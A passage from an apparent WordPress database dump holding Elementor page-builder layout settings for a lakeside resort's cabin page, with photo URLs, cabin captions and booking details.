"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3188235\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3ae6faf\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c43867\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8610c84\"}]},\"elements\":[{\"id\":\"7fbb51d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.10-PM.png\",\"id\":782},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d87bedc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"41f8343\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"478e9cb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8309568\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a685e8c\"}]},\"elements\":[{\"id\":\"6a8b220\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.17-PM.png\",\"id\":783},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7203260\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"wp-caption-text\\\"><br \\/><strong>Done in knotty pine has air conditioning, full kitchen and bathtub<\\/strong><\\/p>\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8075410\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2c48cf1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dcac1af\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d389044\"}]},\"elements\":[{\"id\":\"e118b35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"97d9b2a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c7465d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"11e2398\"}]},\"elements\":[{\"id\":\"5e6d46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin1011interior02.jpg\",\"id\":280}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"47acfec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c86872a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a8e8c8e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"17be54e\"}]},\"elements\":[{\"id\":\"0cd24ef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin12interior.jpg\",\"id\":284}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4384dfc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9fd9d04\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2873594\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"88e6c47\"}]},\"elements\":[{\"id\":\"a7d623e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3948.jpg\",\"id\":388}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2197,789,'vantage_metaslider_slider',''),(2198,789,'vantage_metaslider_slider_stretch','1'),(2199,789,'vantage_menu_icon',''),(2200,789,'siteorigin_page_settings','a:7:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:14:\"featured_image\";b:0;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(2201,789,'_yoast_wpseo_content_score','60'),(2202,793,'_elementor_edit_mode','builder'),(2203,793,'_elementor_template_type','post'),(2204,793,'_elementor_version','2.5.12'),(2205,793,'_wp_page_template','default'),(2206,793,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2207,793,'_elementor_data','[{\"id\":\"f523c97\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5afd9c7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"79c352d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c4cd61c\"}]},\"elements\":[{\"id\":\"c7622c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"013e706\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2a9bf7b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4aff54c\"}]},\"elements\":[{\"id\":\"31f7a67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Love to stay at a Cabin - <a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a><\\/p><p>Cabins are available weekly only\\u00a0 (Saturday to Saturday) during June and July. There are a few weeks still available for 2019.<\\/p><p><strong>Our motel and cabins are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets. <a href=\\\"http:\\/\\/ashbyresort.com\\/campground-map\\/\\\">(see 